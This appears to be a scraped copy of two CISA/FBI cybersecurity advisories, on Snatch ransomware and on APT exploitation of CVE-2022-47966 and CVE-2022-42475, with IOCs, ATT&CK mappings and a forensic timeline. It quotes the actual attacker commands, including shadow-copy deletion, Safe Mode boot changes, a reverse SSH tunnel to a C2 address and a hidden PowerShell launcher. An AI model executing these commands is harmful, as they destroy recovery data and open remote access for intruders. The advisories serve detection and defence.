ed0fd61bf82660a69f5bfe0e66457cfe56d66dd2b310e9e97657c37779aef65d
ghnhfglwaplf.bat
2155a029a024a2ffa4eff9108ac15c7db527ca1c8f89ccfd94cc3a70b77cfc57
nllraq.bat
251427c578eaa814f07037fbe6e388b3bc86ed3800d7887c9d24e7b94176e30d
ygariiwfenmqteiwcr.bat
3295f5029f9c9549a584fa13bc6c25520b4ff9a4b2feb1d9e935cc9e4e0f0924
bsfyqgqeauegwyfvtp.bat
6c9d8c577dddf9cc480f330617e263a6ee4461651b4dec1f7215bda77df911e7
rgibdcghzwpk.bat
84e1476c6b21531de62bbac67e52ab2ac14aa7a30f504ecf33e6b62aa33d1fe5
pxyicmajjlqrtgcnhi.bat
a80c7fe1f88cf24ad4c55910a9f2189f1eedad25d7d0fd53dbfe6bdd68912a84
evhgpp.bat
b998a8c15cc19c8c31c89b30f692a40b14d7a6c09233eb976c07f19a84eccb40
eqbglqcngblqnl.bat
1fbdb97893d09d59575c3ef95df3c929fe6b6ddf1b273283e4efadf94cdc802d
qesbdksdvnotrjnexutx.bat
0965cb8ee38adedd9ba06bdad9220a35890c2df0e4c78d0559cd6da653bf740f
HOW TO RESTORE YOUR FILES.TXT
Filenames
SHA-1
safe.exe
c8a0060290715f266c89a21480fed08133ea2614
Commands
wmiadap.exe /F /T /R
%windir%System32svchost.eve –k WerSvcGroup
conhost.exe 0xFFFFFFFF -ForceV1
vssadmin delete shadows /all /quiet
bcdedit.exe /set {current} safeboot minimal
REG ADD HKLMSYSTEMCurrentControlSetControlSafeBootMinimalVSS /VE /T REG_SZ /F /D Service
REG ADD HKLMSYSTEMCurrentControlSetControlSafeBootMinimalmXoRpcSsx /VE /T REG_SZ /F /D Service
REG QUERY HKLMSYSTEMCurrentControlSetControl /v SystemStartOptions
%CONHOST% “1088015358-1778111623-1306428145949291561678876491840500802412316031-33820320
“C:Program Files (x86)MicrosoftEdgeApplicationmsedge.exe” –flag-switches-begin –flag-switches-end –no-startup-window /prefetch:5
cmd /d /c cmd /d /c cmd /d /c start ” ” C:Usersgrade1AppDataLocalPRETTYOCEANluvApplicationPRETTYOCEANApplicationidf.bi.
Registry Keys
HKLMSOFTWAREMicrosoftWindows Media Player NSS3.0ServersD8B548F0-E306-4B2B-BD82-25DAC3208786FriendlyName
HKUS-1-5-21-4270068108-2931534202-3907561125-1001SoftwareMicrosoftWindowsCurrentVersionShell ExtensionsCached{ED50FC29-B964-
48A9-AFB3-15EBB9B97F36} {ADD8BA80-002B-11D0-8F0F-00C04FD7D062} 0xFFFF
Source
Message
TerminalServices-RemoteConnectionManager
Remote session from client name exceeded the maximum allowed failed logon attempts. The session was forcibly terminated.
Microsoft-Windows-Windows Firewall With Advanced Security%4Firewall
A rule was added (Event 2004) or modified (Event 2005) in the Windows Defender Firewall exception list. All rules included action “Allow” and rule name included “File and Printer Sharing”
Microsoft-Windows-Windows Firewall With Advanced Security%4Firewall
A Windows Defender Firewall setting was changed in private, public, and domain profile with type “Enable Windows Defender Firewall” and value of “no”.
Microsoft-Windows-TaskScheduler%4Operational
Instance of process C:Windowssvchost.exe. (Incorrect file location, should be C:WindowsSystem32svchost.exe)
Mutexes Created
Sessions1BaseNamedObjectsgcc-shmem-tdm2-fc_key
Sessions1BaseNamedObjectsgcc-shmem-tdm2-sjlj_once
Sessions1BaseNamedObjectsgcc-shmem-tdm2-use_fc_key
gcc-shmem-tdm2-fc_key
gcc-hmem-tdm2-sjlj_once
gcc-shmem-tdm2-use_fc_key
MITRE ATT&CK TACTICS AND TECHNIQUES
See Tables 4-16 for all referenced threat actor tactics and techniques in this advisory.
Technique Title
ID
Use
Gather Victim Network Information
T1590
Snatch threat actors may gather information about the victim’s networks that can be used during targeting.
Technique Title
ID
Use
Acquire Infrastructure: Virtual Private Server
T1583.003
Snatch threat actors may rent Virtual Private Servers (VPSs) that can be used during targeting. Snatch threat actors acquire infrastructure from VPS service providers that are known for renting VPSs with minimal registration information, allowing for more anonymous acquisitions of infrastructure.
Technique Title
ID
Use
Valid Accounts
T1078
Snatch threat actors use compromised user credentials from criminal forums/marketplaces to gain access and maintain persistence on a victim’s network.
External Remote Services
T1133
Snatch threat actors exploit weaknesses in RDP to perform brute forcing and gain administrator credentials for a victim’s network.
Snatch threat actors use VPN services to connect to a victim’s network.
Technique Title
ID
Use
Command and Scripting Interpreter: Windows Command Shell
T1059.003
Snatch threat actors may use batch files (
.bat
) during ransomware execution and data discovery.System Services: Service Execution
T1569.002
Snatch threat actors may leverage various Windows tools to enumerate systems on the victim’s network. Snatch ransomware used
sc.exe
.Technique Title
ID
Use
Valid Accounts: Domain Accounts
T1078.002
Snatch threat actors compromise domain accounts to maintain persistence on a victim’s network.
Technique Title
ID
Use
Masquerading
T1036
Snatch threat actors have the ransomware executable match the
SHA-256
hash of a legitimate file to avoid rule-based detection.Indicator Removal: File Deletion
T1070.004
Snatch threat actors delete batch files from a victim’s filesystem once execution is complete.
Modify Registry
T1112
Snatch threat actors modify Windows Registry keys to aid in persistence and execution.
Impair Defenses: Disable or Modify Tools
T1562.001
Snatch threat actors have attempted to disable a system’s antivirus program to enable persistence and ransomware execution.
Impair Defenses: Safe Mode Boot
T1562.009
Snatch threat actors abuse Windows Safe Mode to circumvent detection by antivirus or endpoint protection and encrypt files when few services are running.
Technique Title
ID
Use
Brute Force: Password Guessing
T1110.001
Snatch threat actors use brute force to obtain administrator credentials for a victim’s network.
Technique Title
ID
Use
Query Registry
T1012
Snatch threat actors may interact with the Windows Registry to gather information about the system, configuration, and installed software.
Process Discovery
T1057
Snatch threat actors search for information about running processes on a system.
Technique Title
ID
Use
Remote Services: Remote Desktop Protocol
T1021.001
Snatch threat actors may use Valid Accounts to log into a computer using the Remote Desktop Protocol.
Technique Title
ID
Use
Data from Local System
T1005
Snatch threat actors search systems to find files and folders of interest prior to exfiltration.
Technique Title
ID
Use
Application Layer Protocols: Web Protocols
T1071.001
Snatch threat actors establish connections over port
443
to blend C2 traffic in with other web traffic.Technique Title
ID
Use
Exfiltration
TA0010
Snatch threat actors use exfiltration techniques to steal data from a victim’s network.
Technique Title
ID
Use
Data Encrypted for Impact
T1486
Snatch threat actors encrypt data on target systems or on large numbers of systems in a network to interrupt availability to system and network resources.
Inhibit System Recovery
T1490
Snatch threat actors delete all volume shadow copies from a victim’s filesystem to inhibit system recovery.
MITIGATIONS
These mitigations apply to all stakeholders. The authoring agencies recommend that software manufactures incorporate secure-by-design and -default principles and tactics into their software development practices for hardening software against ransomware attacks (e.g., to prevent threat actors from using Safe Mode to evade detection and file encryption), thus strengthening the secure posture for their customers.
For more information on secure by design, see CISA’s Secure by Design and Default webpage and joint guide.
The FBI and CISA recommend organizations implement the mitigations below to improve your organization’s cybersecurity posture on the basis of the Snatch threat actor’s activity. These mitigations align with the Cross-Sector Cybersecurity Performance Goals (CPGs) developed by CISA and the National Institute of Standards and Technology (NIST). The CPGs provide a minimum set of practices and protections that CISA and NIST recommend all organizations implement. CISA and NIST based the CPGs on existing cybersecurity frameworks and guidance to protect against the most common and impactful threats, tactics, techniques, and procedures. Visit CISA’s Cross-Sector Cybersecurity Performance Goals for more information on the CPGs, including additional recommended baseline protections.
In addition, the authoring authorities of this CSA recommend network defenders apply the following mitigations to limit potential adversarial use of common system and network discovery techniques, and to reduce the impact and risk of compromise by ransomware or data extortion actors:
Note: NIST guidance suggests favoring longer passwords instead of requiring regular and frequent password resets. Frequent password resets are more likely to result in users developing password “patterns” cyber criminals can easily decipher.
VALIDATE SECURITY CONTROLS
In addition to applying mitigations, FBI and CISA recommend exercising, testing, and validating your organization’s security program against the threat behaviors mapped to the MITRE ATT&CK for Enterprise framework in this advisory. FBI and CISA recommend testing your existing security controls inventory to assess how they perform against the ATT&CK techniques described in this advisory.
To get started:
FBI and CISA recommend continually testing your security program, at scale, in a production environment to ensure optimal performance against the MITRE ATT&CK techniques identified in this advisory.
RESOURCES
REPORTING
The FBI is seeking any information that can be shared, to include boundary logs showing communication to and from IP addresses, a sample ransom note, communications with Snatch threat actors, Bitcoin wallet information, decryptor files, and/or a benign sample of an encrypted file. The FBI and CISA strongly discourage paying ransom as payment does not guarantee victim files will be recovered. Furthermore, payment may also embolden adversaries to target additional organizations, encourage other criminal actors to engage in the distribution of ransomware, and/or fund illicit activities. Regardless of whether you or your organization have decided to pay the ransom, the FBI and CISA urge you to promptly report ransomware incidents to the FBI Internet Crime Complaint Center (IC3) at ic3.gov, a local FBI Field Office, or to CISA at report@cisa.gov or (888) 282-0870.
REFERENCES
[1] DataBreaches.net
DISCLAIMER
The information in this report is being provided “as is” for informational purposes only. FBI and CISA do not endorse any commercial entity, product, or service, including any subjects of analysis. Any reference to specific commercial products, processes, or services by service mark, trademark, manufacturer, or otherwise, does not constitute or imply endorsement, recommendation, or favoring by FBI or CISA.
VERSION HISTORY
September 20, 2023: Initial version.
Source de l’article sur us-cert.gov
Multiple Nation-State Threat Actors Exploit CVE-2022-47966 and CVE-2022-42475
Sécurité de l'information et du SI, Sécurité de l’information, Sécurité du système d’informationSUMMARY
The Cybersecurity and Infrastructure Security Agency (CISA), Federal Bureau of Investigation (FBI), and Cyber National Mission Force (CNMF) identified the presence of indicators of compromise (IOCs) at an Aeronautical Sector organization as early as January 2023. Analysts confirmed that nation-state advanced persistent threat (APT) actors exploited CVE-2022-47966 to gain unauthorized access to a public-facing application (Zoho ManageEngine ServiceDesk Plus), establish persistence, and move laterally through the network. This vulnerability allows for remote code execution on the ManageEngine application. Additional APT actors were also observed exploiting CVE-2022-42475 to establish presence on the organization’s firewall device.
CISA and co-sealers are releasing this joint Cybersecurity Advisory (CSA) to provide network defenders with tactics, techniques, and procedures (TTPs), IOCs, and methods to detect and protect against similar exploitation.
Download the PDF version of this report:
For a downloadable copy of IOCs, see:
For a downloadable copy of the Malware Analysis Report (MAR) accompanying this CSA, see:
Note: This advisory uses the MITRE ATT&CK® for Enterprise framework, version 13. See Tables 3-13 for the APT actors’ activity mapped to MITRE ATT&CK tactics and techniques with corresponding mitigation and/or detection recommendations.
Overview
By request of the impacted organization, CISA conducted an incident response engagement from February to April 2023. CISA and co-sealers assess that beginning as early as January 2023, multiple nation-state APT actors were present on the organization’s network via at least two initial access vectors:
CISA and co-sealers identified an array of threat actor activity, to include overlapping TTPs across multiple APT actors. Per the activity conducted, APT actors often scan internet-facing devices for vulnerabilities that can be easily exploited. Firewall, virtual private networks (VPNs), and other edge network infrastructure continue to be of interest to malicious cyber actors. When targeted, they can be leveraged to expand targeted network access, serve as malicious infrastructure, or a mixture of both.
APT Actor Activity
Initial Access Vector 1
As early as January 2023, APT actors exploited CVE-2022-47966 [T1190] for initial access to the organization’s web server hosting the public-facing application, Zoho ManageEngine ServiceDesk Plus. CISA observed indications in log files that a connection to the known malicious IP address
192.142.226[.]153
was made as part of initial exploitation.Through exploitation of CVE-2022-47966, APT actors achieved root level access on the web server and created a local user account [T1136.001] named
Azure
with administrative privileges [T1068]. Actors were further able to download malware, enumerate the network, collect administrative user credentials, and move laterally through the organization’s network. CISA and co-sealers were unable to determine if proprietary information was accessed, altered, or exfiltrated. This was due to the organization not clearly defining where their data was centrally located and CISA having limited network sensor coverage.Initial Access Vector 2
Additional APT actors exploited CVE-2022-42475 on the organization’s firewall device, which was indicated by multiple successful VPN connections from known-malicious IPs between February 1-16, 2023. It was identified that APT actors compromised and used disabled, legitimate administrative account credentials [T1078.003] from a previously hired contractor—of which the organization confirmed the user had been disabled prior to the observed activity.
Analysis identified that a common behavior for these threat actors was to use disabled administrative account credentials and delete logs from several critical servers in the environment [T1070.001]. This prevented the ability to detect follow-on exploitation or data exfiltration. CISA and co-sealers were also unable to further track the activity due to the organization not having Network Address Translation (NAT) IP logging enabled.
APT actors initiated multiple Transport Layer Security (TLS)-encrypted sessions [T1573.002] on Transmission Control Protocol (TCP) port 10443 [T1571], indicating successful exchanges of data transfer from the firewall device. APT actors were observed connecting to the device from the following actor-controlled C2 IP addresses:
144.202.2[.]71
207.246.105[.]240
45.77.121[.]232
47.90.240[.]218
APT actors further leveraged legitimate credentials to move from the firewall to a web server, where multiple web shells were loaded—among other locations, such as the OWA server—into the following directories. Note: The following file paths to these web shells were received in coordination with a trusted third-party; however, the artifacts were not received for analysis.
c:Program FilesMicrosoft Office Web AppsRootWebsiteen-usresource.aspx
c:inetpubwwwrootuninetcssfont-awesomecssdiscover.ashx
c:inetpubwwwrootuninetcssfont-awesomecssconfiglogin.ashx
c:Program FilesCommon FilesMicrosoft SharedWeb Server Extensions15templatelayoutsapproveinfo.aspx
c:Program FilesMicrosoft Office Web AppsRootWebsiteinfos.aspx
c:Program FilesMicrosoft Office Web AppsRootWebsiteerrorinfo.aspx
c:Program FilesMicrosoft Office Web AppsRootWebsiteinfos.ashx
c:Program FilesMicrosoft Office Web AppsRootWebsiteen-userror.aspx
c:Program FilesMicrosoft Office Web AppsRootWebsiteen-usinfos.aspx
c:Program FilesMicrosoft Office Web AppsRootWebsiteen-usinfo.aspx
c:Program FilesMicrosoft Office Web AppsRootWebsiteen-usinfo-1.aspx
c:Program FilesMicrosoft Office Web AppsRootWebsiteen-usnew_list.aspx
c:Program FilesMicrosoft Office Web AppsRootWebsiteen-userrorinfo.aspx
c:Program FilesMicrosoft Office Web AppsRootWebsiteen-uslgnbotr.ashx
c:inetpubpasswordchange LECPNJYRH.aspx
c:inetpubpasswordchange9ehj.aspx
c:inetpubwwwrootwssVirtualDirectoriesPortal80_vti_pvtservicesinfo.ashx
c:inetpubwwwrootwssVirtualDirectoriesPortal80_vti_pvtservices.aspx
c:inetpubredirectedSites[REDACTED]productsuns1fw.aspx
c:inetpubredirectedSites[REDACTED]productsuns1ew.aspx
The following IP addresses were identified as associated with the loaded web shells:
45.90.123[.]194
154.6.91[.]26
154.6.93[.]22
154.6.93[.]5
154.6.93[.]12
154.6.93[.]32
154.6.93[.]24
184.170.241[.]27
191.96.106[.]40
102.129.145[.]232
Forensic Timeline of APT Actor Activity
Tables 1 and 2 list the timeline of events discovered during the incident response, as well as tools used by the APT actors to conduct their operations, respectively. All timestamps are presented in Coordinated Universal Time (UTC).
Timestamp (UTC)
Event
Description
2023-01-18
11:57:02
Hello World
User-Agent string observed in 44 total events.Uniform Resource Identifier (URI):
/cgi-bin/downloadFlile[.]cgi
Hello World
, the User-Agent string inside of the initiated HTTP request, was observed during communication between the organization’s web server and malicious command and control (C2) server IP92.118.39[.]82
[T1071.001]. This string has been observed in open source as an initial step of the Mirai botnet to download malicious artifacts [T1583.005].[1]2023-01-20
Attempts made to export three files; associated with malicious IP
192.142.226[.]153
.APT actors attempted to export [TA0009], [TA0010] three files, which were analyzed and identified as Local Security Authority Subsystem Service (LSASS) dump files. These files were renamed with
.zip
and.gif
extensions to evade detection [T1036.008]. Analysis confirmed the APT actors were unsuccessful at exfiltrating these files:wo_view_bg.zip
(09:06:37 UTC)wo_view_bg1.gif
(09:08:11 UTC)wo_view_bg2.gif
(09:19:43 UTC)Note: If local administrative access is achieved on a victim host, dumping LSASS credentials may allow for lateral movement across the environment. This behavior was identified during the engagement and is detailed throughout Table 1.
2023-01-20
16:51:05
Successful web server exploitation via CVE-2022-47966.
Successful web server (Zoho ManageEngine ServiceDesk Plus) exploitation via CVE-2022-47966.
2023-01-21
06:46:42
Azure
local user account with administrative permissions created.A local user account with administrative permissions, named
Azure
, was created on the server hosting ServiceDesk Plus.2023-01-21
06:49:40
LSASS dumped by
Azure
user.The
Azure
user successfully accessed and dumped credentials stored in the process memory of LSASS for the Active Directory (AD) domain [T1003.001].Note: Adversaries may create a local account to maintain access to victim systems. Local accounts are those configured by an organization for use by users, remote support, services, or for administration on a single system or service. Such accounts may be used to establish secondary credentialed access that do not require persistent remote access tools to be deployed on the system.
2023-01-21
06:50:59
Mimikatz.exe
downloaded via ConnectWise ScreenConnect.The legitimate ConnectWise ScreenConnect client was utilized to connect to the ServiceDesk system, download
mimikatz.exe
, and execute malicious payloads to steal credentials [T1219], [T1588.002].Note: ConnectWise ScreenConnect was observed in multiple locations within the organization’s environment, but the organization confirmed that it was not authorized software. Analysis assessed APT actors downloaded the legitimate software for malicious, illegitimate use prior to the download of
mimikatz.exe
.2023-01-21
07:34:32
Bitmap.exe
malware downloaded and designated to connect to C2 IP179.60.147[.]4
.Azure
user account downloadedbitmap.exe
to the ServiceDesk system to execute an obfuscated, embedded malicious payload from its C2 server [T1027.009]. This malware is identified as a variant of Metasploit (Meterpreter).See MAR-10430311-1.v1 for additional details.
2023-01-21
08:46:23
Mimikatz credential dump files created.
Two files (
c:windowssystem32fuu.txt, c:windowssystem32jojo.txt
) were created as means for Mimikatz to dump/write credentials to disk on the ServiceDesk system [T1003].2023-01-21
09:25:58
Legitimate files/applications
nmap.exe
andnpcap.exe
downloaded.Azure
user account downloadednmap.exe
[T1018] andnpcap.exe
[T1040] to continue network and credential information gathering efforts. Though legitimate applications, APT actors used these files for illegitimate, malicious purposes.Note: Adversaries may gather information about the victim’s network topology that can be used during targeting. Information about network topologies may include a variety of details, including the physical and/or logical arrangement of both external-facing and internal network environments. This information may also include specifics regarding network devices (gateways, routers, etc.) and other infrastructure.
2023-01-21
13:56:14
ssh2.zip
downloaded by theAzure
user account.APT actors downloaded the file
ssh2.zip
via theAzure
user account, which contained legitimate files that could have been leveraged for malicious purposes. When unzipped, the following files were extracted:install-sshd.ps1 (script)
psexec.exe
sshd.exe
ssh.exe
ssh-sk-helper.exe
libcrypto.dll
Note: CISA analyzed these files and did not identify the files as malicious. However,
ssh.exe
was downloaded to establish persistence on the ServiceDesk system via SSH [T1133] and is detailed in the scheduled task below.2023-01-21
14:02:45
ngrok.yml
config file, and Remote Desktop Protocol (RDP) connection established.Ngrok was used to establish an RDP connection [T1021.001]—another method of maintaining persistence on the ServiceDesk system. In this instance, Ngrok was used to establish a reverse proxy connection to the ServiceDesk system.
At the time of analysis, the firewall access control lists (ACLs) allowed all outbound connections. Considering APT actors utilized an outbound proxy, the RDP session was successfully established as the connection was initiated from the ServiceDesk system.
Note: RDP is a common feature in operating systems, which allows a user to log into an interactive session with a system desktop graphical user interface on a remote system.
2023-01-21
14:31:01
SSH tools downloaded to establish reverse (remote) communication.
Three identified executables, which provide a command line interface with the compromised system, were observed in the following file system locations:
c:windowssystem32ssh-shellhost.exe
c:windowssystem32ssh-agent.exe
c:windowssystem32ssh-add.exe
While the files were not identified as malicious, they were loaded for malicious purposes.
2023-01-21
14:33:11
license validf
scheduled task created to communicate with malicious IP104.238.234[.]145
.license validf
scheduled task [T1036.004] was created to executessh.exe
on a recurring basis on the ServiceDesk system [T1053.005]:c:WindowsSystem32ssh.exe -N -f -R 12100 sst@104.238.234.145 -p 443 -o StrictHostKeyChecking=no
Analysis identified
ssh.exe
was used to establish a SSH reverse tunnel to the APT actors’ C2 with dynamic port forwarding [T1572]. This allowed the actors to send traffic from their C2 server into the environment and connect directly to other systems and resources.2023-01-21
14:51:49
PsExec executed on the ServiceDesk system.
Analysis identified evidence and execution of two files (
PsExec.exe
andpsexec.exe
) on the ServiceDesk system. These files were determined to be benign.APT actors utilized PsExec to create a scheduled task and force-store administrative credentials to the local machine.
psexec.exe -i -s C:WindowsSystem32mmc.exe /s C:WindowsSystem32taskschd.msc
powershell New-ItemProperty -Path "HKLM:SystemCurrentControlSetControlLsa" -Name "DisableRestrictedAdmin" -Value "0" -PropertyType DWORD -Force
Note: PsExec, a command line utility from Microsoft’s Sysinternals Suite, is known to be used for lateral movement; evidence of lateral movement via PsExec has not been confirmed.
2023-01-21
14:55:02
ProcDump created on the ServiceDesk system.
ProcDump was created within the
c:windowssystem32prc64.exe
directory. This was later identified as a method for enumerating running processes/applications [T1057] and dumping LSASS credentials.2023-01-24
15:07:18
Apache Log4j exploit attempted against the ServiceDesk system.
APT actors attempted to exploit a known Apache Log4j vulnerability (CVE-2021-44228) in the ServiceDesk system but were unsuccessful. The two IPs and one domain associated with this exploitation attempt are:
80.85.241[.]15
68.177.56[.]38
main.cloudfronts[.]net
2023-01-25
00:17:33
Mimikatz credential dump files created.
One file (
c:ManageEngineServiceDeskbin1.txt
) was created as a method for Mimikatz to dump/write credentials to disk on the ServiceDesk system.Note: This is a different path and time associated with Mimikatz than listed above.
2023-01-29
HTTP-GET requests sent to C2 IP
92.118.39[.]82
.The server hosting ServiceDesk was observed beaconing/sending HTTP-GET requests to a suspected APT-controlled C2 server, indicating malware was successfully implanted.
2023-02-02
05:51:08
Resource.aspx
web shell detected.Using additionally compromised, legitimate administrative credentials, APT actors logged into the Outlook Web Application (OWA) server from the ServiceDesk system. The actors dropped an Active Server Pages Extended (ASPX) web shell in the following file system location, which was designed to execute remote JavaScript code [T1059.007] on the OWA server [T1505.003]:
c:Program FilesMicrosoft Office Web AppsRootWebSiteen-usresource.aspx
Note: The administrative user’s credentials were obtained from the APT actors’ collection (LSASS dump) of credentials from the entire AD domain. This user is separate from the actor-created
Azure
user account.See MAR-10430311-1.v1 for additional details.
2023-02-02
18:45:58
Metasploit service installed.
APT actors installed Metasploit with the following attributes on the organization’s domain controller [T1059.001]:
QrrCvbrvnxasKTSb
[T1543.003]%COMSPEC% /b /c start /b /min powershell.exe -nop -w hidden -noni -c "if([IntPtr]::Size -eq 4)
[T1564.003]Note: Adversaries may abuse PowerShell commands and scripts for execution. PowerShell is a powerful interactive command-line interface and scripting environment included in the Windows operating system. Adversaries can use PowerShell to perform several actions, including discovery of information and execution of code.
2023-02-03
03:27:59
ConfigLogin.aspx
web shell detected.APT actors dropped an additional ASPX web shell on a web server in the following file system location:
c:inetpubwwwrotuninetcssfont-awesomecssConfigLogin.aspx
See MAR-10430311-1.v1 for additional details.
2023-02-03
15:12:23
wkHPd.exe
created to communicate with malicious IP108.62.118[.]160
.APT actors created and used a variant of Metasploit (Meterpreter) on the ServiceDesk system, listed as
wkHPd.exe
[T1587.001]. This variant serves as an attack payload that runs an interactive shell and allows a malicious actor to control and execute code on a system.See MAR-10430311-1.v1 for additional details.
2023-02-08
08:56:35,
2023-02-09
20:19:59,
2023-03-04,
2023-03-18
Hypertext Preprocessor (PHP) files uploaded via HTTP-POST request from malicious IP
193.142.146[.]226
.PHP files were uploaded to the ServiceDesk system via HTTP-POST request. APT actors were observed writing 16 instances of the following files to disk:
[REDACTED]/wp-content/themes/seotheme/db.php
(12 instances)[REDACTED]/wp-content/plugins/ioptimization/IOptimize.php
(4 instances)2023-03-06
06:49:40
Interact.sh
APT actors executed Domain Name System (DNS) scanning at an additional server (not the ServiceDesk system) and directed callback to the
Interact.sh
domain, which indicated the server was susceptible to a DNS-style attack [T1046].Destination IP:
103.105.49[.]108
Post-engagement analysis was extended but analysts were unable to determine additional actions taken by the APT actors, likely due to a lack of sensor coverage and data unavailability. With the data available, it was determined APT actors used the tools listed in Table 2 during their operations.
Tool
Description
Observation
Mimikatz [2]
A credential dumping tool capable of obtaining plaintext Windows account logins and passwords, along with many other features that make it useful for testing the security of networks.
In addition to using Mimikatz for credential dumping, APT actors dumped the following Windows Registry Hive files:
sam.hiv
[T1003.002]system.hiv
security.hiv
These files were dumped to obtain registry information such as users on the system, data used by the operating system [T1012], and installed programs.
Ngrok [3]
Ngrok software operates by running a client process on the machine and creating a private connection tunnel to a designated open port. Ngrok delivers instant ingress to applications in any cloud, private network, or devices with authentication, load balancing, and other critical controls.
In recent years, Ngrok has been leveraged maliciously by a variety of threat actors, including use for persistence, lateral movement, and data exfiltration.[4],[5],[6]
Using Ngrok as an external service, APT actors were able to gain access to and utilize the command line on victim systems.
Note: CISA and co-sealers have observed this commonly used commercial platform being abused by malicious actors to bypass typical firewall controls. Ngrok’s ability to tunnel RDP and other services securely over internet connections makes it a target for abuse by malicious actors.
ProcDump
A command-line application used to monitor processes and create crash dump files. A crash dump file contains the data loaded in memory at the time the dump was triggered. It is typically used for troubleshooting errors with an application or operating system.
APT actors used ProcDump to conduct reconnaissance and examine spawned processes (applications in use). This tool was also utilized as a utility for dumping credentials from the server hosting ServiceDesk Plus.
Metasploit
Metasploit is an open-source penetration testing software.
APT actors’ specific use of Meterpreter—an attack payload of Metasploit—serves as an interactive shell and allows threat actors to control and execute code on a system.
Interact.sh
An open-source tool for detecting external interactions (communication).[7] This tool is used to detect callbacks from target systems for specified vulnerabilities and commonly used during the reconnaissance stages of adversary activity.
APT actors likely used
Interact.sh
to refrain from using and disclosing their own C2 infrastructure.anydesk.exe
A remote desktop application that provides platform-independent remote access to personal computers and other devices running the host application. It offers remote control, file transfer, and VPN functionality.
Between early-February and mid-March 2023,
anydesk.exe
was observed on three hosts with different certificate issuers and hashes—none of which were the certified issuer [T1553.002]. APT actors compromised one host and moved laterally to install the executable on the remaining two [T1570]—listed in order of time, as follows:c:programdataanydesk.exe
c:Users[REDACTED]DownloadsAnyDesk.exe
c:Users[REDACTED]DocumentspersonalprogramAnyDesk.exe
Note: Analysts confirmed APT actors’ weaponized use of
anydesk.exe
but were unable to confirm how the software was installed on each host.quser.exe
A valid program on Windows machines that displays information about user sessions on a Remote Desktop Session Host server [T1049], including the name of the user, name of the session on the remote desktop session host server, session ID, state of the session (active or disconnected), idle time (number of minutes since last keystroke or mouse movement), and date/time the user logged on.[8]
APT actors were observed using this tool as early as March 2023 across four locations with the same name but different hashes (one of which is associated with the Portuguese [Brazil] language pack):
c:ProgramFilesWindowsAppsMicrosoft.LanguageExperiencePackpt-BR_19041.56.186.0_neutral__8wekyb3d8bbweWindowsSystem32pt-BR
xpack.exe
A custom
.NET
loader that decrypts (AES), loads, and executes accompanying files.Xpack.exe
indicators were present on multiple organization hosts, with an unverified user account observed navigating to the sites:xpack.github[.]io
andxpack.disqus[.]com
. Additionally, one administrator account and multiple user accounts were observed executing the xpack.exe file from a hidden directory [T1564.001]:c:USERS[REDACTED].P2POOLPLUGINSORG.ECLIPSE.EMBEDCDT.TEMPLATES.XPACK_6.3.1.202210101738
This malware was predominantly used to execute system commands, drop additional malware and tools, and stage data for exfiltration [T1074]. Note: The data exfiltrated is unknown.
MITRE ATT&CK TACTICS AND TECHNIQUES
See Tables 3-13 for all referenced APT actors’ tactics and techniques for enterprise environments in this advisory. For assistance with mapping malicious cyber activity to the MITRE ATT&CK framework, see CISA and MITRE ATT&CK’s Best Practices for MITRE ATT&CK Mapping and CISA’s Decider Tool.
Technique Title
ID
Use
Acquire Infrastructure: Botnet
T1583.005
Actors used User-Agent string
Hello World
as an initial step of the Mirai botnet to later download malicious artifacts.Develop Capabilities: Malware
T1587.001
Actors created and used a variant of Metasploit (Meterpreter) on the ServiceDesk system, listed as
wkHPd.exe
. This malware serves as an attack payload that runs an interactive shell; it allows for control and code execution on a system.Obtain Capabilities: Exploits
T1588.002
Actors leveraged the legitimate ConnectWise ScreenConnect client to download and utilize the credential dumping tool,
mimikatz.exe
.Technique Title
ID
Use
Exploit Public-Facing Application
T1190
Actors exploited a known vulnerability (CVE-2022-47966) in the organization’s web server hosting Zoho ManageEngine ServiceDesk Plus.
Actors also attempted to exploit a known Apache Log4j vulnerability (CVE-2021-44228) in the ServiceDesk system but were unsuccessful.
Technique Title
ID
Use
Command and Scripting Interpreter: PowerShell
T1059.001
Actors installed and used Metasploit via PowerShell on the organization’s domain controller.
Command and Scripting Interpreter: JavaScript
T1059.007
Actors dropped an ASPX web shell on the OWA server, which was designed to execute remote JavaScript code.
Technique Title
ID
Use
Scheduled Task/Job: Scheduled Task
T1053.005
Actors created the scheduled task
license validf
to executessh.exe
on a recurring basis. This executable was observed as means of establishing persistence on the ServiceDesk system.Valid Accounts: Local Accounts
T1078.003
Actors compromised and utilized account credentials from a previously hired contractor, of which the contract ended prior to the timeframe of observed activity.
External Remote Services
T1133
ssh.exe
executes on a recurring basis via a scheduled task on the ServiceDesk system as a method for access via SSH.Create Account: Local Account
T1136.001
Actors created a local account with administrative permissions on the server hosting ServiceDesk Plus.
Server Software Component: Web Shell
T1505.003
Actors logged into the OWA server from the ServiceDesk system and dropped an ASPX web shell to establish persistent access and execute remote code.
Create or Modify System Process: Windows Service
T1543.003
Actors created a Windows Service via Metasploit.
Technique Title
ID
Use
Exploitation for Privilege Escalation
T1068
Through exploitation of CVE-2022-47966, actors were given root level access on the web server and created a local user account named
Azure
with administrative privileges.Technique Title
ID
Use
Indicator Removal: Clear Windows Event Logs
T1070.001
Actors compromised and used disabled, legitimate administrative account credentials to delete logs from several critical servers in the environment.
Masquerading: Masquerade Task or Service
T1036.004
Actors created a scheduled task
license validf
, which appears as legitimate/benign and executesssh.exe
on a recurring basis on the ServiceDesk system.Masquerading: Masquerade File Type
T1036.008
Actors attempted to export three files, which were analyzed and identified as LSASS dump files. These files were renamed with
.zip
and.gif
extensions to evade detection.Obfuscated Files or Information: Embedded Payloads
T1027.009
Actors downloaded the malware
bitmap.exe
on the ServiceDesk system to execute an obfuscated, embedded malicious payload from its C2 server.Subvert Trust Controls: Code Signing
T1553.002
Anydesk.exe
was observed on three hosts with different certificate issuers and hashes—none of which were the certified issuer.Hide Artifacts: Hidden Files and Directories
T1564.001
Actors used
xpack.exe
as a method for decrypting, loading, and executing accompanying files from a hidden directory.Hide Artifacts: Hidden Window
T1564.003
Actors used
-w hidden
to conceal PowerShell windows by setting the WindowStyle parameter to hidden.Technique Title
ID
Use
OS Credential Dumping
T1003
Actors created three files as means for Mimikatz to dump/write credentials to disk on the ServiceDesk system.
OS Credential Dumping: LSASS Memory
T1003.001
Actors successfully accessed and dumped credentials stored in the process memory of LSASS for the AD domain, including with the use of ProcDump.
OS Credential Dumping: Security Account Manager
T1003.002
Actors dumped
sam.hiv
to obtain information about users on the system.Technique Title
ID
Use
System Network Connections Discovery
T1049
Quser.exe
was executed to acquire information about user sessions on a Remote Desktop Session Host server.Query Registry
T1012
Actors dumped
system.hiv
